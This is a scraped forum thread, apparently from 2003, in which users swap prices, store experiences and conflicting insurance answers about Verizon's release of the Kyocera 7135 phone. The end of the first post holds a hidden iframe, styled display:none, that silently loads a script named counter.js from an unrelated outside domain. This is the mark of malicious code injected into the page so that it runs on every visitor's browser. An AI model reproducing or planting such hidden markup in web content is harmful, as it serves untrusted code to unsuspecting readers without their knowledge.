+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast
Results 1 to 20 of 76
  1. #1
    Registered User
    Join Date
    12-27-2002
    Posts
    10

    Verizon telesales releases 7135 April 7th

    You can now buy the 7135 from Verizon.
    Call Verizon tele-sales 800-922-0204 or 800-256-4646. Let me know if this works for you. Thanks
    2 year contract $499
    1 year contract $530

    I hope this helps.

    I also hope this information doesn't get shoved to the back of the threads as this information is NOT a rumor.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    04-08-2003
    Posts
    2

    7135's available in new jersey from Horizon

    NEWS FLASH, VERIZON NEW JERSEY SELLING 7135's ....

    I received a call from the Verizon (Route 22 Westbound, Union) Retail Store. I had my name on a list for months requesting the 7135. Well, they called me yesterday and said that I could come in and purchase the phone. I was told that this is a "soft launch" and that they had 195 phones in their NJ warehouse. Our office was closing early due to the snow storm, so I immediately went to the store and ordered two phones for my daughter and I. The price was $499 for 2 years and $530 for on year. You will need to select the calling plan that you desire. Be advised that if you are presently a customer as I am, you will need to again completely fill out an application just like you were a first time subscriber. The phones will be shipped to me in two days.

    Please note that you have to go to the retail store to buy the phone and it will be shipped to you. You can not pick up the phone at the retail store.



  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    Since the release date is upon us and passed, anyone may post their experience from getting this phone thru Verizon here. we've had getconnected and alltell threads, now we have a Verizon thread. :Smoke:

  4. #4
    Never involved in a flame war! sputnik's Avatar
    Join Date
    04-07-2003
    Location
    Amesbury, MA (formerly LI, NY)
    Posts
    238
    i called that number yesterday and was told that the phone has still not been released
    is this BS or what?
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

  5. #5
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by sputnik
    is this BS or what?
    Yes :p

    I think the biggest issue here is (and has been) that very few handsets released by carriers prompt so many questions prior to it's availability like the 7135 has. I don't think that large carriers like Verizon have a way of preparing their reps for a situation like this (or they just choose not to, especially since sales volume for the 7135 will be relatively small compared to many of their other phones).
    Please visit my picture site: Robert-O-Rama :)

  6. #6
    Registered User
    Join Date
    03-24-2003
    Posts
    56

    Re: 7135's available in new jersey from Horizon

    I stopped at the same RT22 store yesterday around 11:30AM and was told 'NOT TILL APRIL 27th"

    Edit: before I saved this message I just called the store and spoke to the store manager and he confirmed what you had said. They said it can be ordered from the store. However he did say they will have no support for it as yet nor any software upgrades.

    Originally posted by hdtvjim
    NEWS FLASH, VERIZON NEW JERSEY SELLING 7135's ....

    I received a call from the Verizon (Route 22 Westbound, Union) Retail Store. I had my name on a list for months requesting the 7135. Well, they called me yesterday and said that I could come in and purchase the phone. I was told that this is a "soft launch" and that they had 195 phones in their NJ warehouse. Our office was closing early due to the snow storm, so I immediately went to the store and ordered two phones for my daughter and I. The price was $499 for 2 years and $530 for on year. You will need to select the calling plan that you desire. Be advised that if you are presently a customer as I am, you will need to again completely fill out an application just like you were a first time subscriber. The phones will be shipped to me in two days.

    Please note that you have to go to the retail store to buy the phone and it will be shipped to you. You can not pick up the phone at the retail store.



  7. #7
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827

    Re: Re: 7135's available in new jersey from Horizon

    Originally posted by MisterEd
    NOT TILL APRIL 27th"

    However he did say they will have no support for it as yet
    That implies that there will be support for the 7135 at some point... I guess we'll see how that all works out

    April 27th is a Sunday...
    Please visit my picture site: Robert-O-Rama :)

  8. #8
    Registered User
    Join Date
    03-24-2003
    Posts
    56

    Re: Re: Re: 7135's available in new jersey from Horizon

    Maybe I was off by a day. In any case, I ordered one today. Didn't have to fill out any forms (as did the other fellow at the same store). I've never "held" one so I'm glad they give a 15 day money back guarantee. Even with pictures I can't get a real feel for the size (which is my major concern). After my current V60i it might be "size shock".


    $499 2yrs
    $530 1 year
    $580 no contract

    Oh ... NO INSURANCE available on this model.

    Originally posted by Robert K.
    That implies that there will be support for the 7135 at some point... I guess we'll see how that all works out

    April 27th is a Sunday...

  9. #9
    Registered User
    Join Date
    11-14-2002
    Posts
    10
    Is it really $580 from Verizon with no contract? Is this the price for existing Verizon customers wanting the phone? This is the first I've seen anyone mention the non contract price, everyone has been quoting 1 and 2 year contract pricing. So if I understand this correctly, it's $699 from Kyocera direct, but if I hang on just a little bit longer I can get it for $580 or is there a catch for existing Verizon customers?

  10. #10
    Registered User
    Join Date
    03-24-2003
    Posts
    56
    That's what I was quoted at the Verizon store about 1 hr ago when I ordered mine. I took the 1yr since I know I'll be using it.

    Originally posted by anderp
    Is it really $580 from Verizon with no contract? Is this the price for existing Verizon customers wanting the phone? This is the first I've seen anyone mention the non contract price, everyone has been quoting 1 and 2 year contract pricing. So if I understand this correctly, it's $699 from Kyocera direct, but if I hang on just a little bit longer I can get it for $580 or is there a catch for existing Verizon customers?

  11. #11
    Registered User
    Join Date
    03-24-2003
    Posts
    56
    LOL -- just sent 2 of my friends to that same Union NJ store and now they are refusing to sell them the phones. Salesperson was writing up the sale (same person I spoke with) and the manager came "running" out and told her she couldn't do it anymore. Ultimately they did get theirs but he said "No Mas."

    Idiots

    Edit: they both bought it "no contract" for $570.

  12. #12
    Registered User
    Join Date
    09-12-2002
    Posts
    45

    Re: Re: Re: Re: 7135's available in new jersey from Horizon

    I called and spoke to several sales people, and they all denied adamantly that the store was taking orders for the 7135. I could tell they were being evasive, and it is my opinion that they are probably selling it before Verizon has authorized it, and someone there is at this point afraid they are going to lose their job.

    Just in case this is not so, If one of you who has purchased the phone knows the name of the sales person who sold it, or could post a copy of a receipt from the store I would appreciate it.

    Kevin

    Originally posted by MisterEd
    Maybe I was off by a day. In any case, I ordered one today. Didn't have to fill out any forms (as did the other fellow at the same store). I've never "held" one so I'm glad they give a 15 day money back guarantee. Even with pictures I can't get a real feel for the size (which is my major concern). After my current V60i it might be "size shock".


    $499 2yrs
    $530 1 year
    $580 no contract

    Oh ... NO INSURANCE available on this model.

  13. #13
    Registered User
    Join Date
    03-28-2003
    Posts
    3

    Re: Re: Re: Re: 7135's available in new jersey from Horizon

    Oh ... NO INSURANCE available on this model. [/B][/QUOTE]



    MisterEd,
    Since others have been able to obtain insurance for this phone from Verizon, did the store say why it was not available through them?



    -JCARGAR

  14. #14
    Registered User
    Join Date
    03-24-2003
    Posts
    56

    Re: Re: Re: Re: Re: 7135's available in new jersey from Horizon

    As soon as they brought it up on the computer it flashed "No Insurance Offered." If anyone is paying Verizon for insurance they should double check with them to see if they are REALLY covered (although once they sell - or once you are paying for it - I would assume they would have to cover it). Maybe becausethe replacement cost is too high ??

    QUOTE]Originally posted by jcargar
    Oh ... NO INSURANCE available on this model. [/QUOTE]



    MisterEd,
    Since others have been able to obtain insurance for this phone from Verizon, did the store say why it was not available through them?



    -JCARGAR [/B][/QUOTE]

  15. #15
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912

    Re: Re: Re: Re: 7135's available in new jersey from Horizon

    Originally posted by MisterEd
    Oh ... NO INSURANCE available on this model.
    Wow! This is not consistent since my corporate Verizon rep had my phone sent out with the Assurion insurance brochure included in the box. I am most definitely insured.

  16. #16
    Registered User
    Join Date
    10-18-2002
    Location
    Reston, VA
    Posts
    264

    This gets better and better

    I just called 611 from my phone, spoke with a Customer Service Rep first, who told me that the 7135 is not available for 2 more weeks and Insurance will NOT be offered for this phone, and a Sales Rep from Telesales and he too said that the 7135 is not available and will be available the 24th of this month. I asked about Insurance, he put me on hold and came back 2 mins later with an absolute NO! Claiming that VZW will NOT be offering insurance for the Kyocera 7135 - claims it stated in the most recent email distributed to all sales locations as of this morning.

    So, is the phone available or not ?

    Is Insurance available or not?

    Another waiting game, I'd guess.

    audio_*****
    Audio_***** :)
    6035-7135-Treo 650

  17. #17
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    I keep meaning to call Asurion to try to clarify this. Not that it would really matter what they say now... it's when you try to make a claim that it really matters!
    Please visit my picture site: Robert-O-Rama :)

  18. #18
    Registered User
    Join Date
    05-28-2002
    Posts
    89
    I called and ordered the phone thru *611 last nite. I had no problems ordering the phone. I just called on the insurance question and was told that if I ordered it thru Verizon then it will be covered as the phone listed on my account.

  19. #19
    Registered User
    Join Date
    10-18-2002
    Location
    Reston, VA
    Posts
    264

    Get This!

    Jut for sh*** and giggles I called another local VZW store. I spoke with a sales dude who was willing to take my order (in strore only) and said I'd have the phone in 2 days. He was aslo willing to transfer my current insurance to th e7135 if I came in to place an order.

    I took it one step further and said that I'd need something in writting from the strore Mgr. that said that if insurance was not offered and this comes to light after my sale, that regardless of use and wear and tear on the phone, I'd get a 100% refund. He said "no way". So I sent an email to corporate with his store number and his name and mgr. name and asked for answers to my questions.

    BTW: The price I was quoted was

    $530 = 1 yr.
    $499 = 2yr.
    $399 = 2yr. with NE2


    talk amongst yerselves.....

    audio_*****
    Audio_***** :)
    6035-7135-Treo 650

  20. #20
    Registered User
    Join Date
    03-24-2003
    Posts
    56

    Re: Re: Re: Re: Re: 7135's available in new jersey from Horizon

    Definately strange. Maybe because you are a corporate customer? They took my $530 and told me (before I even asked) "NO INSURANCE." The truth is, whether they tell you yes or no or whether they include a brochure or not it means nothing until you try to make a claim. However, if they are charging you for it, I would assume whether they officially do or do not insure it, they would have to cover you at least ONCE since you are paying for it. It wouldn't be the first time (especially on a new product) that they really don't have a clue.

    Originally posted by Beryl
    Wow! This is not consistent since my corporate Verizon rep had my phone sent out with the Assurion insurance brochure included in the box. I am most definitely insured.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts